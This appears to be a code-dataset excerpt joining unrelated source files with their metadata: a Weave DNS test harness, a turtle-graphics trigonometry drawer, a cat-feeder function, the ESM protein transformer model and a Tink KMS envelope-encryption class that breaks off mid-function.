emsg = "prefix is None, Please specifiy a valid prefix."
self.__log_error_and_exit(emsg)
def __gather_results(self):
"""
gather result from get_test_output()
"""
quiet = True
results = {}
results['status'], results['output'] = self.get_test_output(self.node_id, self.node_process_tag, quiet)
return (results)
def __process_results(self, results):
"""
process results from gather_results()
"""
status = False
output = ""
status = (results['status'] == 0)
output = results['output']
return (status, output)
def __start_node_dnscheck(self):
"""
lwip and socket use different command for now
"""
cmd = "sudo "
cmd += self.getWeaveInetLayerDNSPath()
node_ip = self.getNodeAddressesOnPrefix(self.prefix, self.node_id)[0]
if node_ip == None:
emsg = "Could not find IP address of the node, %s" % (self.node_id)
self.__log_error_and_exit(emsg)
if self.use_lwip:
cmd += " --tap-device " + self.tap_if + " -a " + node_ip + " --ipv4-gateway " + self.ipv4_gateway + \
" --dns-server " + self.dns
print "dns check command : {}".format(cmd)
self.start_weave_process(self.node_id, cmd, self.node_process_tag, sync_on_output=self.ready_to_service_events_str)
def __stop_node(self):
self.stop_weave_process(self.node_id, self.node_process_tag)
def run(self):
self.logger.debug("[localhost] WeaveInetDNS: Run.")
self.__pre_check()
self.__start_node_dnscheck()
emsg = "WeaveInet %s should be running." % (self.node_process_tag)
self.logger.debug("[%s] WeaveInet: %s" % (self.node_id, emsg))
self.__stop_node()
node_output_value, node_output_data = \
self.get_test_output(self.node_id, self.node_process_tag, True)
node_strace_value, node_strace_data = \
self.get_test_strace(self.node_id, self.node_process_tag, True)
results = self.__gather_results()
result, output = self.__process_results(results)
data = {}
data["node_output"] = node_output_data
data["node_strace"] = node_strace_data
self.logger.debug("[localhost] WeaveInetDNSTest: Done.")
return ReturnMsg(result, data)
| [] |
ZezaoDev/Circtrigo | funcoes.py | 5e5f6be0bdee17d30c2993478ca25409b82b6af3 | import turtle as t
import math
class circTrigo:
def __init__(self):
self.raio = 0
self.grau = 0
self.seno = 0
self.cosseno = 0
self.tangente = 0
self.quadrante = 0
self.tema = ''
t.bgcolor("black")
t.pencolor("white")
def seta(self):
        # DRAWS AN ARROW
t.left(90)
t.forward(5)
t.right(120)
t.forward(10)
t.right(120)
t.forward(10)
t.right(120)
t.forward(5)
t.right(90)
def linha(self, pxls):
        # DRAWS A DOTTED LINE
pixels = int(pxls//1)
if pixels % 2 == 0:
pixels = pixels + 1
for x in range(0, pixels//10):
t.pendown()
t.forward(5)
t.penup()
t.forward(5)
t.pendown()
t.forward(pixels%10)
def reset(self):
        # RETURNS TO THE STARTING POSITION
t.penup()
t.home()
t.pendown()
t.speed(0)
t.pensize(2)
t.pencolor("white")
def circulo(self, raio):
        # DRAWS THE CIRCLE
self.raio = raio
t.right(90)
t.penup()
t.forward(self.raio)
t.left(90)
t.pendown()
t.circle(self.raio)
self.reset()
def eixos(self):
        # X AXIS
t.penup()
t.backward(self.raio + 50)
t.pendown()
self.linha((self.raio*2)+100)
self.seta()
self.reset()
        # Y AXIS
t.left(90)
t.penup()
t.backward(self.raio + 50)
t.pendown()
self.linha((self.raio*2)+100)
self.seta()
self.reset()
def angulo(self, grau):
        # DRAWS THE ANGLE
self.grau = grau % 360
t.left(self.grau)
t.forward(self.raio)
self.reset()
        # SETS THE VALUES OF SINE, COSINE AND TANGENT.
self.seno = math.sin(math.radians(self.grau))
self.cosseno = math.cos(math.radians(self.grau))
self.tangente = math.tan(math.radians(self.grau))
        # DETERMINES THE QUADRANT OF THE ANGLE
vquad = self.grau
if 0 < vquad < 90:
self.quadrante = 1
elif 90 < vquad < 180:
self.quadrante = 2
elif 180 < vquad < 270:
self.quadrante = 3
elif 270 < vquad < 360:
self.quadrante = 4
        if vquad == 0 or vquad == 90 or vquad == 180 or vquad == 270 or vquad == 360: # Quadrant 0 represents angles with undefined results
self.quadrante = 0
def sen(self):
        # DRAWS THE SINE
t.left(self.grau)
t.forward(self.raio)
t.pencolor("red")
if self.quadrante == 1:
t.left(180 - self.grau)
self.linha(self.cosseno * self.raio)
t.left(90)
t.forward(self.seno * self.raio)
print (self.seno)
elif self.quadrante == 2:
t.right(self.grau)
self.linha((self.cosseno * self.raio) * -1)
t.right(90)
t.forward(self.seno * self.raio)
print (self.seno)
elif self.quadrante == 3:
t.right(self.grau)
self.linha(self.cosseno * self.raio * -1)
t.left(90)
t.forward(self.seno * self.raio * -1)
print (self.seno)
elif self.quadrante == 4:
t.left(180 - self.grau)
self.linha(self.cosseno * self.raio)
t.left(90)
t.forward(self.seno * self.raio)
print (self.seno)
else:
print("Erro: angulo invalido")
self.reset()
def csen(self):
        # DRAWS THE COSINE
t.left(self.grau)
t.forward(self.raio)
t.pencolor("green")
if self.quadrante == 1:
t.right(self.grau + 90)
self.linha(self.seno * self.raio)
t.right(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
elif self.quadrante == 2:
t.right(self.grau + 90)
self.linha(self.seno * self.raio)
t.right(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
elif self.quadrante == 3:
t.right(self.grau - 90)
self.linha(self.seno * self.raio * -1)
t.right(90)
t.forward(self.cosseno * self.raio * -1)
print (self.cosseno)
elif self.quadrante == 4:
t.right(self.grau - 90)
self.linha(self.seno * self.raio * -1)
t.left(90)
t.forward(self.cosseno * self.raio)
print (self.cosseno)
else:
print("Erro: angulo invalido")
self.reset()
def tan(self):
        # DRAWS THE TANGENT
t.left(self.grau)
t.penup()
t.pencolor("blue")
if self.quadrante == 1:
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(self.grau + 90)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 2:
t.left(180)
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.left(90 - self.grau)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 3:
t.left(180)
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(self.grau - 90)
t.forward(self.tangente * self.raio)
print (self.tangente)
elif self.quadrante == 4:
t.forward(self.raio)
t.pendown()
self.linha(math.sqrt(((self.tangente*self.raio)**2) + (self.raio**2)) - self.raio)
t.right(90 + self.grau)
t.forward(self.tangente * self.raio)
print (self.tangente)
else:
print("Erro: angulo invalido")
self.reset()
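# Illustrative usage sketch (not part of the original file; values are assumed):
#     c = circTrigo()
#     c.circulo(200)    # circle of radius 200
#     c.eixos()         # x and y axes
#     c.angulo(30)      # mark a 30-degree angle
#     c.sen()           # sine segment (red)
#     c.csen()          # cosine segment (green)
#     c.tan()           # tangent segment (blue)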
| [((15, 8, 15, 26), 'turtle.bgcolor', 't.bgcolor', ({(15, 18, 15, 25): '"""black"""'}, {}), "('black')", True, 'import turtle as t\n'), ((16, 8, 16, 27), 'turtle.pencolor', 't.pencolor', ({(16, 19, 16, 26): '"""white"""'}, {}), "('white')", True, 'import turtle as t\n'), ((20, 8, 20, 18), 'turtle.left', 't.left', ({(20, 15, 20, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((21, 8, 21, 20), 'turtle.forward', 't.forward', ({(21, 18, 21, 19): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((22, 8, 22, 20), 'turtle.right', 't.right', ({(22, 16, 22, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((23, 8, 23, 21), 'turtle.forward', 't.forward', ({(23, 18, 23, 20): '(10)'}, {}), '(10)', True, 'import turtle as t\n'), ((24, 8, 24, 20), 'turtle.right', 't.right', ({(24, 16, 24, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((25, 8, 25, 21), 'turtle.forward', 't.forward', ({(25, 18, 25, 20): '(10)'}, {}), '(10)', True, 'import turtle as t\n'), ((26, 8, 26, 20), 'turtle.right', 't.right', ({(26, 16, 26, 19): '(120)'}, {}), '(120)', True, 'import turtle as t\n'), ((27, 8, 27, 20), 'turtle.forward', 't.forward', ({(27, 18, 27, 19): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((28, 8, 28, 19), 'turtle.right', 't.right', ({(28, 16, 28, 18): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((41, 8, 41, 28), 'turtle.forward', 't.forward', ({(41, 18, 41, 27): '(pixels % 10)'}, {}), '(pixels % 10)', True, 'import turtle as t\n'), ((45, 8, 45, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((46, 8, 46, 16), 'turtle.home', 't.home', ({}, {}), '()', True, 'import turtle as t\n'), ((47, 8, 47, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((48, 8, 48, 18), 'turtle.speed', 't.speed', ({(48, 16, 48, 17): '(0)'}, {}), '(0)', True, 'import turtle as t\n'), ((49, 8, 49, 20), 'turtle.pensize', 't.pensize', ({(49, 18, 49, 19): '(2)'}, {}), '(2)', True, 'import turtle as t\n'), ((50, 8, 50, 27), 'turtle.pencolor', 't.pencolor', ({(50, 19, 50, 26): '"""white"""'}, {}), "('white')", True, 'import turtle as t\n'), ((55, 8, 55, 19), 'turtle.right', 't.right', ({(55, 16, 55, 18): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((56, 8, 56, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((57, 8, 57, 28), 'turtle.forward', 't.forward', ({(57, 18, 57, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((58, 8, 58, 18), 'turtle.left', 't.left', ({(58, 15, 58, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((59, 8, 59, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((60, 8, 60, 27), 'turtle.circle', 't.circle', ({(60, 17, 60, 26): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((65, 8, 65, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((66, 8, 66, 34), 'turtle.backward', 't.backward', ({(66, 19, 66, 33): '(self.raio + 50)'}, {}), '(self.raio + 50)', True, 'import turtle as t\n'), ((67, 8, 67, 19), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((72, 8, 72, 18), 'turtle.left', 't.left', ({(72, 15, 72, 17): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((73, 8, 73, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((74, 8, 74, 34), 'turtle.backward', 't.backward', ({(74, 19, 74, 33): '(self.raio + 50)'}, {}), '(self.raio + 50)', True, 'import turtle as t\n'), ((75, 8, 75, 19), 
'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((83, 8, 83, 25), 'turtle.left', 't.left', ({(83, 15, 83, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((84, 8, 84, 28), 'turtle.forward', 't.forward', ({(84, 18, 84, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((105, 8, 105, 25), 'turtle.left', 't.left', ({(105, 15, 105, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((106, 8, 106, 28), 'turtle.forward', 't.forward', ({(106, 18, 106, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((107, 8, 107, 25), 'turtle.pencolor', 't.pencolor', ({(107, 19, 107, 24): '"""red"""'}, {}), "('red')", True, 'import turtle as t\n'), ((138, 8, 138, 25), 'turtle.left', 't.left', ({(138, 15, 138, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((139, 8, 139, 28), 'turtle.forward', 't.forward', ({(139, 18, 139, 27): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((140, 8, 140, 27), 'turtle.pencolor', 't.pencolor', ({(140, 19, 140, 26): '"""green"""'}, {}), "('green')", True, 'import turtle as t\n'), ((171, 8, 171, 25), 'turtle.left', 't.left', ({(171, 15, 171, 24): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((172, 8, 172, 17), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((173, 8, 173, 26), 'turtle.pencolor', 't.pencolor', ({(173, 19, 173, 25): '"""blue"""'}, {}), "('blue')", True, 'import turtle as t\n'), ((36, 12, 36, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((37, 12, 37, 24), 'turtle.forward', 't.forward', ({(37, 22, 37, 23): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((38, 12, 38, 21), 'turtle.penup', 't.penup', ({}, {}), '()', True, 'import turtle as t\n'), ((39, 12, 39, 24), 'turtle.forward', 't.forward', ({(39, 22, 39, 23): '(5)'}, {}), '(5)', True, 'import turtle as t\n'), ((40, 12, 40, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((87, 29, 87, 52), 'math.radians', 'math.radians', ({(87, 42, 87, 51): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((88, 32, 88, 55), 'math.radians', 'math.radians', ({(88, 45, 88, 54): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((89, 33, 89, 56), 'math.radians', 'math.radians', ({(89, 46, 89, 55): 'self.grau'}, {}), '(self.grau)', False, 'import math\n'), ((109, 12, 109, 35), 'turtle.left', 't.left', ({(109, 19, 109, 34): '(180 - self.grau)'}, {}), '(180 - self.grau)', True, 'import turtle as t\n'), ((111, 12, 111, 22), 'turtle.left', 't.left', ({(111, 19, 111, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((112, 12, 112, 44), 'turtle.forward', 't.forward', ({(112, 22, 112, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((142, 12, 142, 35), 'turtle.right', 't.right', ({(142, 20, 142, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((144, 12, 144, 23), 'turtle.right', 't.right', ({(144, 20, 144, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((145, 12, 145, 47), 'turtle.forward', 't.forward', ({(145, 22, 145, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((175, 12, 175, 32), 'turtle.forward', 't.forward', ({(175, 22, 175, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((176, 12, 176, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), 
((178, 12, 178, 35), 'turtle.right', 't.right', ({(178, 20, 178, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((179, 12, 179, 48), 'turtle.forward', 't.forward', ({(179, 22, 179, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((115, 12, 115, 30), 'turtle.right', 't.right', ({(115, 20, 115, 29): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((117, 12, 117, 23), 'turtle.right', 't.right', ({(117, 20, 117, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((118, 12, 118, 44), 'turtle.forward', 't.forward', ({(118, 22, 118, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((148, 12, 148, 35), 'turtle.right', 't.right', ({(148, 20, 148, 34): '(self.grau + 90)'}, {}), '(self.grau + 90)', True, 'import turtle as t\n'), ((150, 12, 150, 23), 'turtle.right', 't.right', ({(150, 20, 150, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((151, 12, 151, 47), 'turtle.forward', 't.forward', ({(151, 22, 151, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((182, 12, 182, 23), 'turtle.left', 't.left', ({(182, 19, 182, 22): '(180)'}, {}), '(180)', True, 'import turtle as t\n'), ((183, 12, 183, 32), 'turtle.forward', 't.forward', ({(183, 22, 183, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((184, 12, 184, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((186, 12, 186, 34), 'turtle.left', 't.left', ({(186, 19, 186, 33): '(90 - self.grau)'}, {}), '(90 - self.grau)', True, 'import turtle as t\n'), ((187, 12, 187, 48), 'turtle.forward', 't.forward', ({(187, 22, 187, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((121, 12, 121, 30), 'turtle.right', 't.right', ({(121, 20, 121, 29): 'self.grau'}, {}), '(self.grau)', True, 'import turtle as t\n'), ((123, 12, 123, 22), 'turtle.left', 't.left', ({(123, 19, 123, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((124, 12, 124, 49), 'turtle.forward', 't.forward', ({(124, 22, 124, 48): '(self.seno * self.raio * -1)'}, {}), '(self.seno * self.raio * -1)', True, 'import turtle as t\n'), ((154, 12, 154, 35), 'turtle.right', 't.right', ({(154, 20, 154, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((156, 12, 156, 23), 'turtle.right', 't.right', ({(156, 20, 156, 22): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((157, 12, 157, 52), 'turtle.forward', 't.forward', ({(157, 22, 157, 51): '(self.cosseno * self.raio * -1)'}, {}), '(self.cosseno * self.raio * -1)', True, 'import turtle as t\n'), ((177, 23, 177, 81), 'math.sqrt', 'math.sqrt', ({(177, 33, 177, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((190, 12, 190, 23), 'turtle.left', 't.left', ({(190, 19, 190, 22): '(180)'}, {}), '(180)', True, 'import turtle as t\n'), ((191, 12, 191, 32), 'turtle.forward', 't.forward', ({(191, 22, 191, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((192, 12, 192, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((194, 12, 194, 35), 'turtle.right', 't.right', ({(194, 20, 194, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((195, 12, 195, 48), 'turtle.forward', 't.forward', ({(195, 22, 195, 47): '(self.tangente * 
self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((127, 12, 127, 35), 'turtle.left', 't.left', ({(127, 19, 127, 34): '(180 - self.grau)'}, {}), '(180 - self.grau)', True, 'import turtle as t\n'), ((129, 12, 129, 22), 'turtle.left', 't.left', ({(129, 19, 129, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((130, 12, 130, 44), 'turtle.forward', 't.forward', ({(130, 22, 130, 43): '(self.seno * self.raio)'}, {}), '(self.seno * self.raio)', True, 'import turtle as t\n'), ((160, 12, 160, 35), 'turtle.right', 't.right', ({(160, 20, 160, 34): '(self.grau - 90)'}, {}), '(self.grau - 90)', True, 'import turtle as t\n'), ((162, 12, 162, 22), 'turtle.left', 't.left', ({(162, 19, 162, 21): '(90)'}, {}), '(90)', True, 'import turtle as t\n'), ((163, 12, 163, 47), 'turtle.forward', 't.forward', ({(163, 22, 163, 46): '(self.cosseno * self.raio)'}, {}), '(self.cosseno * self.raio)', True, 'import turtle as t\n'), ((185, 23, 185, 81), 'math.sqrt', 'math.sqrt', ({(185, 33, 185, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((198, 12, 198, 32), 'turtle.forward', 't.forward', ({(198, 22, 198, 31): 'self.raio'}, {}), '(self.raio)', True, 'import turtle as t\n'), ((199, 12, 199, 23), 'turtle.pendown', 't.pendown', ({}, {}), '()', True, 'import turtle as t\n'), ((201, 12, 201, 35), 'turtle.right', 't.right', ({(201, 20, 201, 34): '(90 + self.grau)'}, {}), '(90 + self.grau)', True, 'import turtle as t\n'), ((202, 12, 202, 48), 'turtle.forward', 't.forward', ({(202, 22, 202, 47): '(self.tangente * self.raio)'}, {}), '(self.tangente * self.raio)', True, 'import turtle as t\n'), ((193, 23, 193, 81), 'math.sqrt', 'math.sqrt', ({(193, 33, 193, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n'), ((200, 23, 200, 81), 'math.sqrt', 'math.sqrt', ({(200, 33, 200, 80): '((self.tangente * self.raio) ** 2 + self.raio ** 2)'}, {}), '((self.tangente * self.raio) ** 2 + self.raio ** 2)', False, 'import math\n')] |
IniZio/py-skygear | examples/catapi/feeder.py | 88479678f91e678fd931c28295189bfea2148c79 | def pick_food(name):
if name == "chima":
return "chicken"
else:
return "dry food"
| [] |
crochereau/esm | esm/model.py | 881a3b924d3f74e3cddeb6929e91ee7224ef2ebd | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .modules import (
TransformerLayer,
LearnedPositionalEmbedding,
SinusoidalPositionalEmbedding,
RobertaLMHead,
ESM1bLayerNorm,
ContactPredictionHead,
)
class ProteinBertModel(nn.Module):
@classmethod
def add_args(cls, parser):
parser.add_argument(
"--num_layers", default=36, type=int, metavar="N", help="number of layers"
)
parser.add_argument(
"--embed_dim", default=1280, type=int, metavar="N", help="embedding dimension"
)
parser.add_argument(
"--logit_bias", action="store_true", help="whether to apply bias to logits"
)
parser.add_argument(
"--ffn_embed_dim",
default=5120,
type=int,
metavar="N",
help="embedding dimension for FFN",
)
parser.add_argument(
"--attention_heads",
default=20,
type=int,
metavar="N",
help="number of attention heads",
)
def __init__(self, args, alphabet):
super().__init__()
self.args = args
self.alphabet_size = len(alphabet)
self.padding_idx = alphabet.padding_idx
self.mask_idx = alphabet.mask_idx
self.cls_idx = alphabet.cls_idx
self.eos_idx = alphabet.eos_idx
if self.args.arch == 'roberta_large':
self.model_version = 'ESM-1b'
self._init_submodules_esm1b()
else:
self.model_version = 'ESM-1'
self._init_submodules_esm1()
def _init_submodules_common(self):
self.embed_tokens = nn.Embedding(
self.alphabet_size, self.args.embed_dim, padding_idx=self.padding_idx
)
self.layers = nn.ModuleList(
[
TransformerLayer(
self.args.embed_dim, self.args.ffn_embed_dim, self.args.attention_heads,
add_bias_kv=(self.model_version != 'ESM-1b'),
use_esm1b_layer_norm=(self.model_version == 'ESM-1b'),
)
for _ in range(self.args.layers)
]
)
self.contact_head = ContactPredictionHead(self.args.layers * self.args.attention_heads)
def _init_submodules_esm1b(self):
self._init_submodules_common()
self.embed_scale = 1
self.embed_positions = LearnedPositionalEmbedding(self.args.max_positions, self.args.embed_dim, self.padding_idx)
self.emb_layer_norm_before = ESM1bLayerNorm(self.args.embed_dim)
self.emb_layer_norm_after = ESM1bLayerNorm(self.args.embed_dim)
self.lm_head = RobertaLMHead(
embed_dim=self.args.embed_dim,
output_dim=self.alphabet_size,
weight=self.embed_tokens.weight
)
def _init_submodules_esm1(self):
self._init_submodules_common()
self.embed_scale = math.sqrt(self.args.embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(self.args.embed_dim, self.padding_idx)
self.embed_out = nn.Parameter(
torch.zeros((self.alphabet_size, self.args.embed_dim))
)
self.embed_out_bias = None
if self.args.final_bias:
self.embed_out_bias = nn.Parameter(torch.zeros(self.alphabet_size))
def forward(self, tokens, repr_layers=[], need_head_weights=False, return_contacts=False):
if return_contacts:
need_head_weights = True
assert tokens.ndim == 2
padding_mask = tokens.eq(self.padding_idx) # B, T
x = self.embed_scale * self.embed_tokens(tokens)
if getattr(self.args, 'token_dropout', False):
x.masked_fill_((tokens == self.mask_idx).unsqueeze(-1), 0.0)
# x: B x T x C
mask_ratio_train = 0.15 * 0.8
src_lengths = (~padding_mask).sum(-1)
mask_ratio_observed = (tokens == self.mask_idx).sum(-1).float() / src_lengths
x = x * (1 - mask_ratio_train) / (1 - mask_ratio_observed)[:, None, None]
x = x + self.embed_positions(tokens)
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_before(x)
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
repr_layers = set(repr_layers)
hidden_representations = {}
if 0 in repr_layers:
hidden_representations[0] = x
if need_head_weights:
attn_weights = []
# (B, T, E) => (T, B, E)
x = x.transpose(0, 1)
if not padding_mask.any():
padding_mask = None
for layer_idx, layer in enumerate(self.layers):
x, attn = layer(x, self_attn_padding_mask=padding_mask, need_head_weights=need_head_weights)
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x.transpose(0, 1)
if need_head_weights:
# (H, B, T, T) => (B, H, T, T)
attn_weights.append(attn.transpose(1, 0))
if self.model_version == 'ESM-1b':
x = self.emb_layer_norm_after(x)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
# last hidden representation should have layer norm applied
if (layer_idx + 1) in repr_layers:
hidden_representations[layer_idx + 1] = x
x = self.lm_head(x)
else:
x = F.linear(x, self.embed_out, bias=self.embed_out_bias)
x = x.transpose(0, 1) # (T, B, E) => (B, T, E)
result = {"logits": x, "representations": hidden_representations}
if need_head_weights:
# attentions: B x L x H x T x T
attentions = torch.stack(attn_weights, 1)
if self.model_version == "ESM-1":
# ESM-1 models have an additional null-token for attention, which we remove
attentions = attentions[..., :-1]
if padding_mask is not None:
attention_mask = (1 - padding_mask.type_as(attentions))
attention_mask = attention_mask.unsqueeze(1) * attention_mask.unsqueeze(2)
attentions = attentions * attention_mask[:, None, None, :, :]
result["attentions"] = attentions
if return_contacts:
contacts = self._predict_contacts_from_token_attentions(tokens, attentions)
result["contacts"] = contacts
return result
def _predict_contacts_from_token_attentions(self, tokens, attentions):
# remove eos token attentions
if tokens[:, -1].eq(self.eos_idx).any():
eos_mask = tokens.ne(self.eos_idx).to(attentions)
eos_mask = eos_mask.unsqueeze(1) * eos_mask.unsqueeze(2)
attentions = attentions * eos_mask[:, None, None, :, :]
attentions = attentions[..., :-1, :-1]
# remove cls token attentions
if tokens[:, 0].eq(self.cls_idx).all():
attentions = attentions[..., 1:, 1:]
batch_size, layers, heads, seqlen, _ = attentions.size()
attentions = attentions.view(batch_size, layers * heads, seqlen, seqlen)
return self.contact_head(attentions)
def predict_contacts(self, tokens):
return self(tokens, return_contacts=True)["contacts"]
@property
def num_layers(self):
return self.args.layers
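# --- Illustrative usage sketch (editor's addition, not part of the original file) ---
# Shows how the dictionary returned by forward() above is typically unpacked.
# `model` (an instance of this transformer) and `tokens` (a B x T LongTensor of
# encoded sequences) are assumed inputs; the names are illustrative only.
def _example_forward_usage(model, tokens):
    result = model(tokens, repr_layers=[model.num_layers], return_contacts=True)
    logits = result["logits"]  # B x T x alphabet_size
    final_repr = result["representations"][model.num_layers]  # B x T x embed_dim
    attentions = result["attentions"]  # B x layers x heads x T x T
    contacts = result["contacts"]  # B x T' x T' contact probabilities
    return logits, final_repr, attentions, contacts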
bfloch/tink | python/tink/aead/kms_envelope_aead.py | aac780590902f726a8e7d6c4e3aa1cd75f4b0ed5 | # Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for envelope encryption with KMS."""
from __future__ import absolute_import
from __future__ import division
# Placeholder for import for type annotations
from __future__ import print_function
import struct
from tink.proto import tink_pb2
from tink import aead
from tink import core
# Defines in how many bytes the DEK length will be encoded.
DEK_LEN_BYTES = 4
class KmsEnvelopeAead(aead.Aead):
"""Implements envelope encryption.
Envelope encryption generates a data encryption key (DEK) which is used
  to encrypt the payload. The DEK is then sent to a KMS to be encrypted and
the encrypted DEK is attached to the ciphertext. In order to decrypt the
ciphertext, the DEK first has to be decrypted by the KMS, and then the DEK
can be used to decrypt the ciphertext. For further information see
https://cloud.google.com/kms/docs/envelope-encryption.
The ciphertext structure is as follows:
* Length of the encrypted DEK: 4 bytes (big endian)
* Encrypted DEK: variable length, specified by the previous 4 bytes
* AEAD payload: variable length
"""
def __init__(self, key_template: tink_pb2.KeyTemplate, remote: aead.Aead):
self.key_template = key_template
self.remote_aead = remote
def encrypt(self, plaintext: bytes, associated_data: bytes) -> bytes:
# Get new key from template
dek = core.Registry.new_key_data(self.key_template)
dek_aead = core.Registry.primitive(dek, aead.Aead)
# Encrypt plaintext
ciphertext = dek_aead.encrypt(plaintext, associated_data)
# Wrap DEK key values with remote
encrypted_dek = self.remote_aead.encrypt(dek.value, b'')
# Construct ciphertext, DEK length encoded as big endian
enc_dek_len = struct.pack('>I', len(encrypted_dek))
return enc_dek_len + encrypted_dek + ciphertext
def decrypt(self, ciphertext: bytes, associated_data: bytes) -> bytes:
ct_len = len(ciphertext)
# Recover DEK length
if ct_len < DEK_LEN_BYTES:
raise core.TinkError
dek_len = struct.unpack('>I', ciphertext[0:DEK_LEN_BYTES])[0]
# Basic check if DEK length can be valid.
if dek_len > (ct_len - DEK_LEN_BYTES) or dek_len < 0:
raise core.TinkError
# Decrypt DEK with remote AEAD
encrypted_dek_bytes = ciphertext[DEK_LEN_BYTES:DEK_LEN_BYTES + dek_len]
dek_bytes = self.remote_aead.decrypt(encrypted_dek_bytes, b'')
# Get AEAD primitive based on DEK
